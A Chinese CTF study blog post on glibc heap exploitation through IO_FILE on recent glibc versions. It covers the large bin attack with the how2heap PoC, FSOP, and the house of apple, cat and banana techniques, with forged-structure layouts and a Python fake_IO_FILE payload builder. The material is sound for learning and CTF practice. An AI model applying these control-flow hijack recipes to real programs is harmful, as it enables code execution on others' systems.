猫猫&&苹果香蕉の屋

ldrx30

2023-11-02

CTF

IO_FILE

大古：一开始就用红色形态作战不就行了吗

前言

glibc 高版本逐渐移除了__malloc_hook/__free_hook/__realloc_hook 等等一众 hook 全局变量。

利用手段向 IO_FILE 靠拢，但是随着版本越来越高，堆利用手段也变少，IO_FILE 的问题也逐渐减少。

large bin attck

一个范围的bin，保证了其内部有序性。在浅析largebin attack文章中有张图方便理解
同样大小的bin按照free的时间顺序进行排序

fd, bk: 相同大小堆的双向链表，按照时间先后排序
fd_nextsize, bk_nextsize: 大小不同的双向链表
如果只有一个，fd, bk指向 main_arena fd_nextsize 和 bk_nextsize 指向自己

直接使用 how2heap 2.36 的 large bin attack 进行演示(Glibc >= 2.30 都可以使用)。

漏洞的点在开头的注释中给出，就是最后一句赋值语句导致的，victim(正在链入largebin)的size小于已经存在的bin
malloc两个大chunk p1,p2，两个 0x18 是防止 相邻的unsorted bin 合并 以及 被top_chunk合并。
这里注意的是：p1 的 size 大于 p2，但是不要差太多，在同一个largebin 里
free p1，将 p1 放入large bin 中
free p2，修改 p1 的 bk_nextsize 为 &target-0x20
将 p2 放入largebin中
target 值就变成了 p2 的地址

#include<stdio.h>
#include<stdlib.h>
#include<assert.h>

/*
A revisit to large bin attack for after glibc2.30

Relevant code snippet :
	// 因为只有两个bin，因此可以解读一下。
	// 看源码，bck是  bck = bin_at (av, victim_index);
	// av 就是 arena地址，bck就是找arena
	// fwd = bck->fd;   与large bin 之间的双向链表，在这里就是存在的 p1
	if ((unsigned long) (size) < (unsigned long) chunksize_nomask (bck->bk)) {
		fwd = bck;                                    // fwd = arena
		bck = bck->bk;                                // bck = p1
		victim->fd_nextsize = fwd->fd;                // vitim 要放入large bin 的堆 p2 
		victim->bk_nextsize = fwd->fd->bk_nextsize;   // victim.bk_nextsize = p1->bk_nextsize = &target-0x20 
		fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;  // p1.bk_nextsize = victim
		// 但是victim.bk_nextsize = &target-0x20。而这个地址的 fd_nextsize = victim 也就是将 target 值改为 victim，
	}
*/

int main(){
  /*Disable IO buffering to prevent stream from interfering with heap*/
  setvbuf(stdin,NULL,_IONBF,0);
  setvbuf(stdout,NULL,_IONBF,0);
  setvbuf(stderr,NULL,_IONBF,0);

  printf("\n\n");
  printf("Since glibc2.30, two new checks have been enforced on large bin chunk insertion\n\n");
  printf("Check 1 : \n");
  printf(">    if (__glibc_unlikely (fwd->bk_nextsize->fd_nextsize != fwd))\n");
  printf(">        malloc_printerr (\"malloc(): largebin double linked list corrupted (nextsize)\");\n");
  printf("Check 2 : \n");
  printf(">    if (bck->fd != fwd)\n");
  printf(">        malloc_printerr (\"malloc(): largebin double linked list corrupted (bk)\");\n\n");
  printf("This prevents the traditional large bin attack\n");
  printf("However, there is still one possible path to trigger large bin attack. The PoC is shown below : \n\n");
  
  printf("====================================================================\n\n");

  size_t target = 0;
  printf("Here is the target we want to overwrite (%p) : %lu\n\n",&target,target);
  size_t *p1 = malloc(0x428);
  printf("First, we allocate a large chunk [p1] (%p)\n",p1-2);
  size_t *g1 = malloc(0x18);
  printf("And another chunk to prevent consolidate\n");

  printf("\n");

  size_t *p2 = malloc(0x418);
  printf("We also allocate a second large chunk [p2]  (%p).\n",p2-2);
  printf("This chunk should be smaller than [p1] and belong to the same large bin.\n");
  size_t *g2 = malloc(0x18);
  printf("Once again, allocate a guard chunk to prevent consolidate\n");

  printf("\n");

  free(p1);
  printf("Free the larger of the two --> [p1] (%p)\n",p1-2);
  size_t *g3 = malloc(0x438);
  printf("Allocate a chunk larger than [p1] to insert [p1] into large bin\n");

  printf("\n");

  free(p2);
  printf("Free the smaller of the two --> [p2] (%p)\n",p2-2);
  printf("At this point, we have one chunk in large bin [p1] (%p),\n",p1-2);
  printf("               and one chunk in unsorted bin [p2] (%p)\n",p2-2);

  printf("\n");

  p1[3] = (size_t)((&target)-4);
  printf("Now modify the p1->bk_nextsize to [target-0x20] (%p)\n",(&target)-4);

  printf("\n");

  size_t *g4 = malloc(0x438);
  printf("Finally, allocate another chunk larger than [p2] (%p) to place [p2] (%p) into large bin\n", p2-2, p2-2);
  printf("Since glibc does not check chunk->bk_nextsize if the new inserted chunk is smaller than smallest,\n");
  printf("  the modified p1->bk_nextsize does not trigger any error\n");
  printf("Upon inserting [p2] (%p) into largebin, [p1](%p)->bk_nextsize->fd_nextsize is overwritten to address of [p2] (%p)\n", p2-2, p1-2, p2-2);

  printf("\n");

  printf("In out case here, target is now overwritten to address of [p2] (%p), [target] (%p)\n", p2-2, (void *)target);
  printf("Target (%p) : %p\n",&target,(size_t*)target);

  printf("\n");
  printf("====================================================================\n\n");

  assert((size_t)(p2-2) == target);

  return 0;
}

达到一个任意地址写成堆地址的目的。
Glibc 2.29 之前，unsortedbin attack 和 largebin attack 都是攻击 bk 指针，但是后来加了一句检查

在攻击时，fd,bk,fd_nextsize 可以随便覆盖内容，在经过malloc后会修复fd，因为fd指向 size 较小的 victim

IO 流

这里一般指存在一条链，某个函数使用 vtable 的函数指针来调用函数。

程序使用exit退出程序

从main函数退出，glibc会调用exit
显示调用 exit 函数退出程序

malloc_assert: house of kiwi 提出，触发下面的条件选一个

topchunk的大小小于MINSIZE(0X20)
prev inuse位为0
old_top页未对齐
但是从libc 2.36 发生了一点变化，移除IO操作，也就是从libc 2.36不能使用
libc 2.37 直接没有这个函数了。

libc 2.35：

两个函数(fflsh, fxpeintf)都涉及IO操作。

static void
__malloc_assert (const char *assertion, const char *file, unsigned int line,
		 const char *function)
{
  (void) __fxprintf (NULL, "%s%s%s:%u: %s%sAssertion `%s' failed.\n",
		     __progname, __progname[0] ? ": " : "",
		     file, line,
		     function ? function : "", function ? ": " : "",
		     assertion);
  fflush (stderr);
  abort ();
}

FSOP

FSOP就是通过劫持_IO_list_all的值（如large bin attack修改）来执行_IO_flush_all_lockp函数，这个函数会根据_IO_list_all刷新链表中的所有文件流.

当程序从 main 函数返回或者执行 exit 函数的时候，均会调用 fcloseall 函数，调用链如下

最后会遍历_IO_list_all 存放的每一个 IO_FILE 结构体
如果满足条件的话，会调用每个结构体中 vtable->_overflow 函数指针指向的函数。

exit
	fcloseall
		_IO_cleanup
			_IO_flush_all_lockp
				_IO_OVERFLOW

vtable 函数调用过程，就是调用跳表，比如说调用 __overflow

IO_validate_vtable函数负责检查vtable的合法性，会判断vtable的地址是不是在一个合法的区间。如果vtable的地址不合法，程序将会异常终止。
最后就是调用 vtable 里面的函数

1
2
3

#define _IO_OVERFLOW(FP, CH) JUMP1 (__overflow, FP, CH)
#define JUMP1(FUNC, THIS, X1) (_IO_JUMPS_FUNC(THIS)->FUNC) (THIS, X1)
#define _IO_JUMPS_FUNC(THIS) (IO_validate_vtable (_IO_JUMPS_FILE_plus (THIS)))a

检查函数

检查此结构体的 vtable 与 __io_vtables 全局变量表偏移
在这个表里的表就能通过检查。

static inline const struct _IO_jump_t *
IO_validate_vtable (const struct _IO_jump_t *vtable)
{
  uintptr_t ptr = (uintptr_t) vtable;
  uintptr_t offset = ptr - (uintptr_t) &__io_vtables;
  if (__glibc_unlikely (offset >= IO_VTABLES_LEN))
    /* The vtable pointer is not in the expected section.  Use the
       slow path, which will terminate the process if necessary.  */
    _IO_vtable_check ();
  return vtable;
}

所以现在劫持vtable都差不多在这个表里找一个能符合条件的表进行利用。

比如挟持到 _wide_data 相关的表，因为这个表含有vtable，并且函数调用没有检查。

而与其相关的表有3个找 _IO_wfile_jumps 开头的表存在三个

#define _IO_WOVERFLOW(FP, CH) WJUMP1 (__overflow, FP, CH)
#define WJUMP1(FUNC, THIS, X1) (_IO_WIDE_JUMPS_FUNC(THIS)->FUNC) (THIS, X1)
#define _IO_WIDE_JUMPS_FUNC(THIS) _IO_WIDE_JUMPS(THIS)
#define _IO_WIDE_JUMPS(THIS) \
  _IO_CAST_FIELD_ACCESS ((THIS), struct _IO_FILE, _wide_data)->_wide_vtable

house of apple

有三个版本，这里是 version 2.0，控制函数执行流。

IO 流：exit 或者 malloc_assert
能泄露出 heap 地址和 libc 地址
能使用一次 largebin attack（一次即可）

wide_data 结构体

其中也存在一个 vtable
由上面的FSOP知道，在调用_wide_vtable虚表里面的函数时，同样是使用宏去调用，但是没有检查，因此更好利用

struct _IO_wide_data
{
  wchar_t *_IO_read_ptr;    /* Current read pointer */
  wchar_t *_IO_read_end;    /* End of get area. */
  wchar_t *_IO_read_base;    /* Start of putback+get area. */
  wchar_t *_IO_write_base;    /* Start of put area. */
  wchar_t *_IO_write_ptr;    /* Current put pointer. */
  wchar_t *_IO_write_end;    /* End of put area. */
  wchar_t *_IO_buf_base;    /* Start of reserve area. */
  wchar_t *_IO_buf_end;        /* End of reserve area. */
  /* The following fields are used to support backing up and undo. */
  wchar_t *_IO_save_base;    /* Pointer to start of non-current get area. */
  wchar_t *_IO_backup_base;    /* Pointer to first valid character of
                   backup area */
  wchar_t *_IO_save_end;    /* Pointer to end of non-current get area. */
 
  __mbstate_t _IO_state;
  __mbstate_t _IO_last_state;
  struct _IO_codecvt _codecvt;
  wchar_t _shortbuf[1];
  const struct _IO_jump_t *_wide_vtable;
};

假设劫持了vtable 到 IO_wdata_jumps 之后，调用overflow

因为是宏展开，进入 _IO_wfile_jumps 的 overflow 函数。
而这个函数执行流如下

wint_t _IO_wfile_overflow(FILE *f, wint_t wch) {
  if (f->_flags & _IO_NO_WRITES) /* SET ERROR */
  {
    f->_flags |= _IO_ERR_SEEN;
    __set_errno(EBADF);
    return WEOF;
  }
  /* If currently reading or no buffer allocated. */
  if ((f->_flags & _IO_CURRENTLY_PUTTING) == 0 ||
      f->_wide_data->_IO_write_base == NULL) {
    /* Allocate a buffer if needed. */
    if (f->_wide_data->_IO_write_base == 0) {
      _IO_wdoallocbuf(f);
      _IO_free_wbackup_area(f);
      _IO_wsetg(f, f->_wide_data->_IO_buf_base, f->_wide_data->_IO_buf_base,
                f->_wide_data->_IO_buf_base);

      if (f->_IO_write_base == NULL) {
        _IO_doallocbuf(f);
        _IO_setg(f, f->_IO_buf_base, f->_IO_buf_base, f->_IO_buf_base);
      }
    } else {
      /* Otherwise must be currently reading.  If _IO_read_ptr
         (and hence also _IO_read_end) is at the buffer end,
         logically slide the buffer forwards one block (by setting
         the read pointers to all point at the beginning of the
         block).  This makes room for subsequent output.
         Otherwise, set the read pointers to _IO_read_end (leaving
         that alone, so it can continue to correspond to the
         external position). */
      if (f->_wide_data->_IO_read_ptr == f->_wide_data->_IO_buf_end) {
        f->_IO_read_end = f->_IO_read_ptr = f->_IO_buf_base;
        f->_wide_data->_IO_read_end = f->_wide_data->_IO_read_ptr =
            f->_wide_data->_IO_buf_base;
      }
    }
    f->_wide_data->_IO_write_ptr = f->_wide_data->_IO_read_ptr;
    f->_wide_data->_IO_write_base = f->_wide_data->_IO_write_ptr;
    f->_wide_data->_IO_write_end = f->_wide_data->_IO_buf_end;
    f->_wide_data->_IO_read_base = f->_wide_data->_IO_read_ptr =
        f->_wide_data->_IO_read_end;

    f->_IO_write_ptr = f->_IO_read_ptr;
    f->_IO_write_base = f->_IO_write_ptr;
    f->_IO_write_end = f->_IO_buf_end;
    f->_IO_read_base = f->_IO_read_ptr = f->_IO_read_end;

    f->_flags |= _IO_CURRENTLY_PUTTING;
    if (f->_flags & (_IO_LINE_BUF | _IO_UNBUFFERED))
      f->_wide_data->_IO_write_end = f->_wide_data->_IO_write_ptr;
  }
  if (wch == WEOF) return _IO_do_flush(f);
  if (f->_wide_data->_IO_write_ptr == f->_wide_data->_IO_buf_end)
    /* Buffer is really full */
    if (_IO_do_flush(f) == EOF) return WEOF;
  *f->_wide_data->_IO_write_ptr++ = wch;
  if ((f->_flags & _IO_UNBUFFERED) ||
      ((f->_flags & _IO_LINE_BUF) && wch == L'\n'))
    if (_IO_do_flush(f) == EOF) return WEOF;
  return wch;
}
libc_hidden_def(_IO_wfile_overflow)

主要看其中的函数调用，这里主要看作者的几条连

链1：_IO_wfile_overflow 控制函数执行流，但是需要绕过某些检查。伪造fp

_flags设置为~(2 | 0x8 | 0x800)，如果不需要控制rdi，设置为0即可；如果需要获得shell，可设置为 sh;，前面有两个空格
vtable设置为_IO_wfile_jumps/_IO_wfile_jumps_mmap/_IO_wfile_jumps_maybe_mmap地址（加减偏移），使其能成功调用_IO_wfile_overflow即可
_wide_data设置为可控堆地址A，即满足*(fp + 0xa0) = A
_wide_data->_IO_write_base设置为0，即满足*(A + 0x18) = 0
_wide_data->_IO_buf_base设置为0，即满足*(A + 0x30) = 0
_wide_data->_wide_vtable设置为可控堆地址B，即满足*(A + 0xe0) = B
_wide_data->_wide_vtable->doallocate设置为地址C用于劫持RIP，即满足*(B + 0x68) = C，比如说C为system函数

_IO_wfile_overflow
    _IO_wdoallocbuf
        _IO_WDOALLOCATE
            *(fp->_wide_data->_wide_vtable + 0x68)(fp)

链2：_IO_wfile_underflow_mmap 控制函数执行流

_flags设置为~4，如果不需要控制rdi，设置为0即可；如果需要获得shell，可设置为 sh;，注意前面有个空格
vtable设置为_IO_wfile_jumps_mmap地址（加减偏移），使其能成功调用_IO_wfile_underflow_mmap即可
_IO_read_ptr < _IO_read_end，即满足*(fp + 8) < *(fp + 0x10)
_wide_data设置为可控堆地址A，即满足*(fp + 0xa0) = A
_wide_data->_IO_read_ptr >= _wide_data->_IO_read_end，即满足*A >= *(A + 8)
_wide_data->_IO_buf_base设置为0，即满足*(A + 0x30) = 0
_wide_data->_IO_save_base设置为0或者合法的可被free的地址，即满足*(A + 0x40) = 0
_wide_data->_wide_vtable设置为可控堆地址B，即满足*(A + 0xe0) = B
_wide_data->_wide_vtable->doallocate设置为地址C用于劫持RIP，即满足*(B + 0x68) = C

_IO_wfile_underflow_mmap
    _IO_wdoallocbuf
        _IO_WDOALLOCATE
            *(fp->_wide_data->_wide_vtable + 0x68)(fp)

链3：_IO_wdefault_xsgetn 控制函数执行流

_flags设置为0x800
vtable设置为_IO_wstrn_jumps/_IO_wmem_jumps/_IO_wstr_jumps地址（加减偏移），使其能成功调用_IO_wdefault_xsgetn即可
_mode设置为大于0，即满足*(fp + 0xc0) > 0
_wide_data设置为可控堆地址A，即满足*(fp + 0xa0) = A
_wide_data->_IO_read_end == _wide_data->_IO_read_ptr设置为0，即满足*(A + 8) = *A
_wide_data->_IO_write_ptr > _wide_data->_IO_write_base，即满足*(A + 0x20) > *(A + 0x18)
_wide_data->_wide_vtable设置为可控堆地址B，即满足*(A + 0xe0) = B
_wide_data->_wide_vtable->overflow设置为地址C用于劫持RIP，即满足*(B + 0x18) = C

_IO_wdefault_xsgetn
    __wunderflow
        _IO_switch_to_wget_mode
            _IO_WOVERFLOW
                *(fp->_wide_data->_wide_vtable + 0x18)(fp)

总结一下：使用 largebin attack 劫持_IO_list_all 变量

将其替换为一个伪造的 IO_FILE 结构体（某个我们可控内容的堆）
IO_FILE的 _wide_data 伪造为可控的堆地址空间，进而控制_wide_data->_wide_vtable为可控的堆地址空间
IO_FILE的 vtable 伪造为 _IO_wfile_jumps，这是一个 const 变量, gdb使用p &_IO_wfile_jumps查看
在需要写shellcode时，将C设置为一个写满ROP的堆地址就行。常使用setcontext

house of cat

函数调用链

_IO_wfile_jumps中的_IO_wfile_seekoff函数，然后进入到_IO_switch_to_wget_mode函数中来攻击

__malloc_assert
	__fxprintf
		locked_vfxprintf
			__vfprintf_internal #在这里是跳转到IO_validate_vtable通过vtable+0x38调用的下面函数
				_IO_wfile_seekoff
					_IO_switch_to_wget_mode
						call qword ptr [rax + 0x18] #rax是伪造的io_file的地址

并且house of cat在FSOP的情况下也是可行的，只需修改虚表指针的偏移来调用_IO_wfile_seekoff即可（通常是结合__malloc_assert，改vtable为_IO_wfile_jumps+0x10。

off64_t
_IO_wfile_seekoff (FILE *fp, off64_t offset, int dir, int mode)
{
  off64_t result;
  off64_t delta, new_offset;
  long int count;

  if (mode == 0)
    return do_ftell_wide (fp);

  int must_be_exact = ((fp->_wide_data->_IO_read_base
			== fp->_wide_data->_IO_read_end)
		       && (fp->_wide_data->_IO_write_base
			   == fp->_wide_data->_IO_write_ptr));

  bool was_writing = ((fp->_wide_data->_IO_write_ptr
		       > fp->_wide_data->_IO_write_base)
		      || _IO_in_put_mode (fp));
    
  if (was_writing && _IO_switch_to_wget_mode (fp))   // xxxx
    return WEOF;
    ......
}
libc_hidden_def (_IO_wfile_seekoff)

在这里调用 _wide_data 里的 vtable的_overflow，JUMP宏且没有检查

int
_IO_switch_to_wget_mode (FILE *fp)
{
  if (fp->_wide_data->_IO_write_ptr > fp->_wide_data->_IO_write_base)
    if ((wint_t)_IO_WOVERFLOW (fp, WEOF) == WEOF)
      return EOF;
    ......
}
libc_hidden_def (_IO_switch_to_wget_mode)

在_IO_switch_to_wget_mode 调试时发现如下的汇编代码

rdi 是 fp 指针，是我们可以伪造的一个 IO_FILE。
通过 rdi控制 rax，在通过rax控制rdx，也可以过jbe指令。从而最后call 我们指定的shellcode

0x7f4cae745d30 <_IO_switch_to_wget_mode>       endbr64
 0x7f4cae745d34 <_IO_switch_to_wget_mode+4>     mov    rax, qword ptr [rdi + 0xa0]
 0x7f4cae745d3b <_IO_switch_to_wget_mode+11>    push   rbx
 0x7f4cae745d3c <_IO_switch_to_wget_mode+12>    mov    rbx, rdi
 0x7f4cae745d3f <_IO_switch_to_wget_mode+15>    mov    rdx, qword ptr [rax + 0x20]
 0x7f4cae745d43 <_IO_switch_to_wget_mode+19>    cmp    rdx, qword ptr [rax + 0x18]
 0x7f4cae745d47 <_IO_switch_to_wget_mode+23>    jbe    _IO_switch_to_wget_mode+56                <_IO_switch_to_wget_mode+56>

 0x7f4cae745d49 <_IO_switch_to_wget_mode+25>    mov    rax, qword ptr [rax + 0xe0]
 0x7f4cae745d50 <_IO_switch_to_wget_mode+32>    mov    esi, 0xffffffff
 0x7f4cae745d55 <_IO_switch_to_wget_mode+37>    call   qword ptr [rax + 0x18]

所以最后的伪造如下

rax1 为上面的rax
rax2 为下面的rax寄存器

fake_io_addr = heapbase+0xb00                        # 伪造的fake_IO结构体的地址
next_chain = 0
fake_IO_FILE = p64(rdi)                              # _flags=rdi
fake_IO_FILE += p64(0)*7
fake_IO_FILE += p64(1)+p64(2)                        # rcx!=0(FSOP)
fake_IO_FILE += p64(fake_io_addr+0xb0)               # _IO_backup_base=rdx
fake_IO_FILE += p64(call_addr)                       # _IO_save_end=call addr(call setcontext/system)
fake_IO_FILE = fake_IO_FILE.ljust(0x68, '\x00')
fake_IO_FILE += p64(0)                               # _chain
fake_IO_FILE = fake_IO_FILE.ljust(0x88, '\x00')
fake_IO_FILE += p64(heapbase+0x1000)                 # _lock = a writable address
fake_IO_FILE = fake_IO_FILE.ljust(0xa0, '\x00')
fake_IO_FILE += p64(fake_io_addr+0x30)               # _wide_data, rax1_addr
fake_IO_FILE = fake_IO_FILE.ljust(0xc0, '\x00')
fake_IO_FILE += p64(1)                               # mode=1
fake_IO_FILE = fake_IO_FILE.ljust(0xd8, '\x00')
fake_IO_FILE += p64(libcbase+0x2160c0+0x10)          # vtable=IO_wfile_jumps+0x10
fake_IO_FILE += p64(0)*6
fake_IO_FILE += p64(fake_io_addr+0x40)               # rax2_addr

house of banana

不是一种攻击IO_FILE的利用手段。程序通过exit退出时，会调用一个名叫 rtld_global 的结构体中的一系列函数来进行诸如恢复寄存器，清除缓冲区等操作。

可以任意地址写一个堆地址（通常使用 large bin attack）
能够从 main 函数返回或者调用 exit 函数
可以泄露 libc 地址和堆地址

gdb 常用的指令

这是ld.so 文件中的一个地址，因此不能使用libc.sym获得地址

1 2	p &(_rtld_global._dl_ns._ns_loaded->l_next->l_next->l_next) p &_rtld_global

rtld_global 结构体里面装有 _dl_ns 结构体，通过正常 main 函数返回或者调用 exit 退出，触发函数调用链：exit()->_dl_call_fini->(fini_t)array[i]。

glibc 2.37 后的源码，对比之前的与那吗，发现主要的变化为 _dl_call_fini(l);，跟进函数发现除了输出debugging信息函数变了，其余都没变
link map 使用双向链表连接起来
nmaps 是 maps[] 中元素个数，也就是 GL(dl_ns)[ns]._ns_loaded
建议自己随便写个程序，将其中变量打印出来看看。这里加载下面的注释里

// pwndbg> p _rtld_global 
#define GL(name) _rtld_global._##name

void _dl_fini(void) {
#ifdef SHARED
  int do_audit = 0;
again:
#endif

  // pwndbg> p _rtld_global._dl_nns  =>  1
  for (Lmid_t ns = GL(dl_nns) - 1; ns >= 0; --ns) {
  
    /* Protect against concurrent loads and unloads.  */
    __rtld_lock_lock_recursive(GL(dl_load_lock));

	// pwndbg> p _rtld_global._dl_ns[0]._ns_nloaded  => 4
    unsigned int nloaded = GL(dl_ns)[ns]._ns_nloaded;
    
    /* No need to do anything for empty namespaces or those used for
       auditing DSOs.  */
    if (nloaded == 0
#ifdef SHARED
        || GL(dl_ns)[ns]._ns_loaded->l_auditing != do_audit
#endif
    )
      __rtld_lock_unlock_recursive(GL(dl_load_lock));
    else {
#ifdef SHARED
      _dl_audit_activity_nsid(ns, LA_ACT_DELETE);
#endif

      /* Now we can allocate an array to hold all the pointers and
         copy the pointers in.  */
	  // nloaded => 4
      struct link_map *maps[nloaded];

      unsigned int i;
      struct link_map *l;
      assert(nloaded != 0 || GL(dl_ns)[ns]._ns_loaded == NULL);

	  // ns=0    pwndbg> p _rtld_global._dl_ns[0]._ns_loaded
	  // pwndbg> p _rtld_global._dl_ns[0]._ns_loaded.l_next.l_next.l_next.l_next  直到出现0
      for (l = GL(dl_ns)[ns]._ns_loaded, i = 0; l != NULL; l = l->l_next)
        /* Do not handle ld.so in secondary namespaces.  */
        // pwndbg p _rtld_global._dl_ns[0]._ns_loaded.l_real
        // 需要进入这个if线
        if (l == l->l_real) {
          assert(i < nloaded);   // 所以说不会超过4个

          maps[i] = l;
          l->l_idx = i;
          ++i;

          /* Bump l_direct_opencount of all objects so that they
             are not dlclose()ed from underneath us.  */
          ++l->l_direct_opencount;
        }
      assert(ns != LM_ID_BASE || i == nloaded);  // 过其中一个检查，i==nloaded,也就是全部的if线都要进入。
      assert(ns == LM_ID_BASE || i == nloaded || i == nloaded - 1);
      // nmaps = 4
      unsigned int nmaps = i;

      /* Now we have to do the sorting.  We can skip looking for the
         binary itself which is at the front of the search list for
         the main namespace.  */
      _dl_sort_maps(maps, nmaps, (ns == LM_ID_BASE), true); 

      /* We do not rely on the linked list of loaded object anymore
         from this point on.  We have our own list here (maps).  The
         various members of this list cannot vanish since the open
         count is too high and will be decremented in this loop.  So
         we release the lock so that some code which might be called
         from a destructor can directly or indirectly access the
         lock.  */
      __rtld_lock_unlock_recursive(GL(dl_load_lock));

      /* 'maps' now contains the objects in the right order.  Now
         call the destructors.  We have to process this array from
         the front.  */
	  // nmaps = 4
      for (i = 0; i < nmaps; ++i) {
        struct link_map *l = maps[i];   // _ns_loaded

        if (l->l_init_called) {
          _dl_call_fini(l);            // 进入这个函数
#ifdef SHARED
          /* Auditing checkpoint: another object closed.  */
          _dl_audit_objclose(l);
#endif
        }

        /* Correct the previous increment.  */
        --l->l_direct_opencount;
      }

#ifdef SHARED
      _dl_audit_activity_nsid(ns, LA_ACT_CONSISTENT);
#endif
    }
  }

#ifdef SHARED
  if (!do_audit && GLRO(dl_naudit) > 0) {
    do_audit = 1;
    goto again;
  }

  if (__glibc_unlikely(GLRO(dl_debug_mask) & DL_DEBUG_STATISTICS))
    _dl_debug_printf(
        "\nruntime linker statistics:\n"
        "           final number of relocations: %lu\n"
        "final number of relocations from cache: %lu\n",
        GL(dl_num_relocations), GL(dl_num_cache_relocations));
#endif
}

走到 _dl_call_fini

存在一个函数调用 ((fini_t)array[sz])()，map为参数，也就是上面的 GL(dl_ns)[ns]._ns_loaded 和其 next，next->next…

void _dl_call_fini(void *closure_map) {
  // pwndbg> p _rtld_global._dl_ns[0]._ns_loaded 和 l_next 指针
  // pwndbg p *(struct link_map *) 上一个指令地址
  struct link_map *map = closure_map;

  /* When debugging print a message first.  */
  if (__glibc_unlikely(GLRO(dl_debug_mask) & DL_DEBUG_IMPCALLS))
    _dl_debug_printf("\ncalling fini: %s [%lu]\n\n", map->l_name, map->l_ns);

  /* Make sure nothing happens if we are called twice.  */
  map->l_init_called = 0;

  // pwndbg> p _rtld_global._dl_ns[0]._ns_loaded.l_info[26]
  ElfW(Dyn) *fini_array = map->l_info[DT_FINI_ARRAY];
  if (fini_array != NULL) {
	// pwndbg> p _rtld_global._dl_ns[0]._ns_loaded.l_addr
	// pwndbg> p _rtld_global._dl_ns[0]._ns_loaded.l_info[26].d_un.d_val
    ElfW(Addr) *array = (ElfW(Addr) *)(map->l_addr + fini_array->d_un.d_ptr);
    // pwndbg> p _rtld_global._dl_ns[0]._ns_loaded.l_info[28].d_un.d_val / 8
    size_t sz = (map->l_info[DT_FINI_ARRAYSZ]->d_un.d_val / sizeof(ElfW(Addr)));
	// 不管什么类型，最后调用的函数地址可以得到
    while (sz-- > 0) ((fini_t)array[sz])();
  }

  /* Next try the old-style destructor.  */
  ElfW(Dyn) *fini = map->l_info[DT_FINI];
  if (fini != NULL)
    DL_CALL_DT_FINI(map, ((void *)map->l_addr + fini->d_un.d_ptr));
}

主要是函数调用能攻击一下就行，为了更容易的通过if的条件的，我们一般替换链表最后一个 link_map，也就是打第3个linkmapns_loaded.l_next.l_next.l_netx

这是部分的内容，只截取了我们需要的内容
伪造l_addr, fini_array->d_un.d_ptr 内容
DT_FINI_ARRAY 为 26，DT_FINI_ARRAYSZ 为 28
因为源码可能比较抽象，不如直接打印出来，这里只截取有用的部分

pwndbg> p **(struct link_map **) 0x7ffff7fbb188
$5 = {
  l_addr = 140737349943296,
  l_name = 0x7ffff7fbb660 "/lib/x86_64-linux-gnu/libc.so.6",
  l_ld = 0x7ffff7e18bc0,
  l_next = 0x7ffff7fbbb90,
  l_prev = 0x7ffff7fbb170,
  l_real = 0x7ffff7fbb680,
  l_ns = 0,
  l_libname = 0x7ffff7fbbb10,
  l_info = {0x0, 0x7ffff7e18bc0, 0x7ffff7e18c70, 0x7ffff7e18c60, 0x7ffff7e18c00, 0x7ffff7e18c20, 0x7ffff7e18c30, 0x7ffff7e18ca0, 0x7ffff7e18cb0, 0x7ffff7e18cc0, 0x7ffff7e18c40, 0x7ffff7e18c50, 0x0, 0x0, 0x7ffff7e18bd0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7ffff7e18c80, 0x0, 0x0, 0x7ffff7e18c90, 0x0, 0x7ffff7e18be0, 0x0, 0x7ffff7e18bf0, 0x0, 0x0, 0x7ffff7e18cf0, 0x0, 0x0, 0x0, 0x0, 0x7ffff7e18d10, 0x7ffff7e18d00, 0x7ffff7e18ce0, 0x7ffff7e18cd0, 0x0, 0x0, 0x7ffff7e18d30, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7ffff7e18d20, 0x0 <repeats 25 times>, 0x7ffff7e18c10},

pwndbg> ptype ((struct link_map **) 0x7ffff7fbb188 )->l_info
	type = struct {
	    Elf64_Sxword d_tag;
	    union {
	        Elf64_Xword d_val;
	        Elf64_Addr d_ptr;
	    } d_un;
	} *[77]

伪造，堆地址 A

l = l->real => A + 0x28 内容放着堆地址 0x28 = distance _rtld_global._dl_ns[0]._ns_loaded &_rtld_global._dl_ns[0]._ns_loaded.l_real
l->l_init_called 不为0，数字随意，根据版本而异。 distance _rtld_global._dl_ns[0]._ns_loaded &_rtld_global._dl_ns[0]._ns_loaded.l_init_called。我测的是0x312
map.l_info[26] 不为 0, distance _rtld_global._dl_ns[0]._ns_loaded &_rtld_global._dl_ns[0]._ns_loaded.l_info[26]
map.l_info[28] + 8 控制循环次数，一般写成1就行
控制函数执行流 map->l_addr + fini_array->d_un.d_ptr。也就是 map->l_addr + map->l_info[26]->d_un.d_ptr
fini_array map.l_info[26]偏移是0x110。那么28是0x120

// l = l->real
fake+0x28 = fake
// l->l_init_called，但是测试后是一个magic num，需要将其余结构体的linkmap 的 l_init_called 打印出来赋值
fake+0x312 = 0x1

// 注意，需要设置 l_next 位置为0才行

// 下面的就比较固定了
// map.l_info[26]
fake+0x110 = fake+0x40
// 0x48 是 d_un 结构体指针
fake+0x48 = fake+0x58
// 后面加的那个东西
fake+0x58 = shell    // 0 + shell 执行shell

// map.l_info[28]。由上可知，为0，同时为 26 的 d_tag 成员
fake+0x120 = fake+0x48
// l_info[28] 的 d_un 指针。 sz=1
fake+0x50 = 8

pwntools filepointer

其实看pwntools文档可以看出其中对 IO_FILE 也存在很多可以利用的点

1	from pwnlib.filepointer import *

IO_FILE 结构体

_wide_data 就是我们现在常利用的点。
改变成员也只是需要 fs.flags = 0x123 直接赋值
两个 unknown 变量填充结构体

FileStructure(null=0xdeadbeef)

>>> FileStructure()
{ flags: 0x0
 _IO_read_ptr: 0x0
 _IO_read_end: 0x0
 _IO_read_base: 0x0
 _IO_write_base: 0x0
 _IO_write_ptr: 0x0
 _IO_write_end: 0x0
 _IO_buf_base: 0x0
 _IO_buf_end: 0x0
 _IO_save_base: 0x0
 _IO_backup_base: 0x0
 _IO_save_end: 0x0
 markers: 0x0
 chain: 0x0
 fileno: 0x0
 _flags2: 0x0
 _old_offset: 0xffffffff
 _cur_column: 0x0
 _vtable_offset: 0x0
 _shortbuf: 0x0
 unknown1: 0x0
 _lock: 0x0
 _offset: 0xffffffffffffffff
 _codecvt: 0x0
 _wide_data: 0x0
 unknown2: 0x0
 vtable: 0x0}

house of orange

io_list_all 地址
伪造的 vtable 地址

1 2	>>> fileStr = FileStructure(0xdeadbeef) >>> payload = fileStr.orange(io_list_all=0xfacef00d, vtable=0xcafebabe)

stdout leak

从 addr 泄露 size 大小的数据

